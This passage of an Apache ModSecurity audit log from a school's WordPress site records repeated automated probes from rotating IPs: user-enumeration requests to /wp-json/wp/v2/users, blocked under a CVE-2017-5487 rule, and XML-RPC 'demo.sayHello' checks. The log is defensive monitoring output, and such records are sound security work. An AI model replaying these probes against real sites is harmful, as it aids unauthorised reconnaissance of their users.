p1=540, p2=3211, p3=30, p4=32, p5=93, sr=65, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --087c470d-Z-- --a1a53d69-A-- [05/May/2025:22:41:09 +0700] aBjcFU2V_h1VFAgsfgZ4JwAAAAo 103.236.140.4 57858 103.236.140.4 8181 --a1a53d69-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.50 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.50 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a1a53d69-C-- demo.sayHello --a1a53d69-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a1a53d69-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459669560750 5391 (- - -) Stopwatch2: 1746459669560750 5391; combined=4180, p1=556, p2=3399, p3=33, p4=31, p5=94, sr=130, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a1a53d69-Z-- --6423310c-A-- [05/May/2025:22:41:13 +0700] aBjcGYZWvR7-42f6JrAHzgAAANg 103.236.140.4 57904 103.236.140.4 8181 --6423310c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.94.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.94.237 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6423310c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6423310c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459673607578 2311 (- - -) Stopwatch2: 1746459673607578 2311; combined=1259, p1=399, p2=830, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6423310c-Z-- --c8c55e60-A-- [05/May/2025:22:41:16 +0700] aBjcHE2V_h1VFAgsfgZ4LQAAAAQ 103.236.140.4 57928 103.236.140.4 8181 --c8c55e60-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.94.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.94.237 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c8c55e60-C-- demo.sayHello --c8c55e60-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c8c55e60-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459676384897 5821 (- - -) Stopwatch2: 1746459676384897 5821; combined=4289, p1=561, p2=3468, p3=32, p4=35, p5=124, sr=72, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c8c55e60-Z-- --382ca471-A-- [05/May/2025:22:41:46 +0700] aBjcOvZJDMuQndL03JNW4wAAAEs 103.236.140.4 58176 103.236.140.4 8181 --382ca471-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.118.114 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.118.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --382ca471-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --382ca471-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459706224904 2706 (- - -) Stopwatch2: 1746459706224904 2706; combined=1172, p1=457, p2=690, p3=0, p4=0, p5=25, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --382ca471-Z-- --7e60d84e-A-- [05/May/2025:22:41:49 +0700] aBjcPU2V_h1VFAgsfgZ4QAAAABc 103.236.140.4 58208 103.236.140.4 8181 --7e60d84e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.118.114 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.118.114 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7e60d84e-C-- demo.sayHello --7e60d84e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7e60d84e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459709012976 6337 (- - -) Stopwatch2: 1746459709012976 6337; combined=4928, p1=669, p2=4013, p3=38, p4=43, p5=98, sr=140, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7e60d84e-Z-- --96965d0a-A-- [05/May/2025:22:41:52 +0700] aBjcQE2V_h1VFAgsfgZ4SQAAAAg 103.236.140.4 58260 103.236.140.4 8181 --96965d0a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.119.84 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.119.84 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --96965d0a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --96965d0a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459712714268 2427 (- - -) Stopwatch2: 1746459712714268 2427; combined=1228, p1=384, p2=815, p3=0, p4=0, p5=29, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --96965d0a-Z-- --8de4c103-A-- [05/May/2025:22:41:55 +0700] aBjcQ_ZJDMuQndL03JNW7gAAAE8 103.236.140.4 58292 103.236.140.4 8181 --8de4c103-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.119.84 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.119.84 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8de4c103-C-- demo.sayHello --8de4c103-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8de4c103-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459715807268 5602 (- - -) Stopwatch2: 1746459715807268 5602; combined=4108, p1=486, p2=3398, p3=35, p4=33, p5=92, sr=72, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8de4c103-Z-- --2278d44c-A-- [05/May/2025:22:43:44 +0700] aBjcsIZWvR7-42f6JrAIUgAAAMw 103.236.140.4 59284 103.236.140.4 8181 --2278d44c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.75 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.75 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2278d44c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2278d44c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459824784174 2348 (- - -) Stopwatch2: 1746459824784174 2348; combined=1206, p1=400, p2=765, p3=0, p4=0, p5=41, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2278d44c-Z-- --2f1d2c48-A-- [05/May/2025:22:43:47 +0700] aBjcs4ZWvR7-42f6JrAIVQAAANI 103.236.140.4 59308 103.236.140.4 8181 --2f1d2c48-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.75 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.75 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2f1d2c48-C-- demo.sayHello --2f1d2c48-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2f1d2c48-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459827525649 6922 (- - -) Stopwatch2: 1746459827525649 6922; combined=4999, p1=666, p2=4034, p3=38, p4=43, p5=124, sr=125, sw=94, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f1d2c48-Z-- --f106e04a-A-- [05/May/2025:22:45:15 +0700] aBjdCwRwKNFSM6B7_Lac9AAAAIU 103.236.140.4 33444 103.236.140.4 8181 --f106e04a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.84.92 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.84.92 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f106e04a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f106e04a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459915983784 2218 (- - -) Stopwatch2: 1746459915983784 2218; combined=939, p1=321, p2=596, p3=0, p4=0, p5=22, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f106e04a-Z-- --946a5c04-A-- [05/May/2025:22:45:18 +0700] aBjdDgRwKNFSM6B7_LadAAAAAI4 103.236.140.4 33586 103.236.140.4 8181 --946a5c04-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.84.92 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.84.92 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --946a5c04-C-- demo.sayHello --946a5c04-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --946a5c04-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459918825295 4755 (- - -) Stopwatch2: 1746459918825295 4755; combined=3286, p1=410, p2=2683, p3=26, p4=28, p5=80, sr=55, sw=59, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --946a5c04-Z-- --2659086c-A-- [05/May/2025:22:46:10 +0700] aBjdQgRwKNFSM6B7_LaeDAAAAIE 103.236.140.4 35798 103.236.140.4 8181 --2659086c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.72.53 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.72.53 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2659086c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2659086c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459970767718 2803 (- - -) Stopwatch2: 1746459970767718 2803; combined=1275, p1=420, p2=817, p3=0, p4=0, p5=38, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2659086c-Z-- --885f2f21-A-- [05/May/2025:22:46:14 +0700] aBjdRgRwKNFSM6B7_LaeDgAAAIA 103.236.140.4 35830 103.236.140.4 8181 --885f2f21-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.72.53 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.72.53 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --885f2f21-C-- demo.sayHello --885f2f21-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --885f2f21-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459974112671 5633 (- - -) Stopwatch2: 1746459974112671 5633; combined=4164, p1=531, p2=3395, p3=32, p4=34, p5=101, sr=76, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --885f2f21-Z-- --fb7d202f-A-- [05/May/2025:22:46:18 +0700] aBjdSvZJDMuQndL03JNZoAAAAEg 103.236.140.4 35866 103.236.140.4 8181 --fb7d202f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.203 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.203 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fb7d202f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fb7d202f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459978004479 2285 (- - -) Stopwatch2: 1746459978004479 2285; combined=1198, p1=386, p2=777, p3=0, p4=0, p5=34, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fb7d202f-Z-- --b611367f-A-- [05/May/2025:22:46:20 +0700] aBjdTPZJDMuQndL03JNZogAAAEc 103.236.140.4 35894 103.236.140.4 8181 --b611367f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.203 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.203 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b611367f-C-- demo.sayHello --b611367f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b611367f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459980730073 6097 (- - -) Stopwatch2: 1746459980730073 6097; combined=4559, p1=569, p2=3755, p3=31, p4=35, p5=99, sr=80, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b611367f-Z-- --06335647-A-- [05/May/2025:22:46:27 +0700] aBjdU02V_h1VFAgsfgZ6MgAAABE 103.236.140.4 35942 103.236.140.4 8181 --06335647-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.86.111 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.86.111 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --06335647-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --06335647-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459987098110 2708 (- - -) Stopwatch2: 1746459987098110 2708; combined=1241, p1=473, p2=739, p3=0, p4=0, p5=29, sr=109, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --06335647-Z-- --6371a968-A-- [05/May/2025:22:46:29 +0700] aBjdVQRwKNFSM6B7_LaeHwAAAJU 103.236.140.4 35958 103.236.140.4 8181 --6371a968-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.86.111 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.86.111 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6371a968-C-- demo.sayHello --6371a968-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6371a968-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data 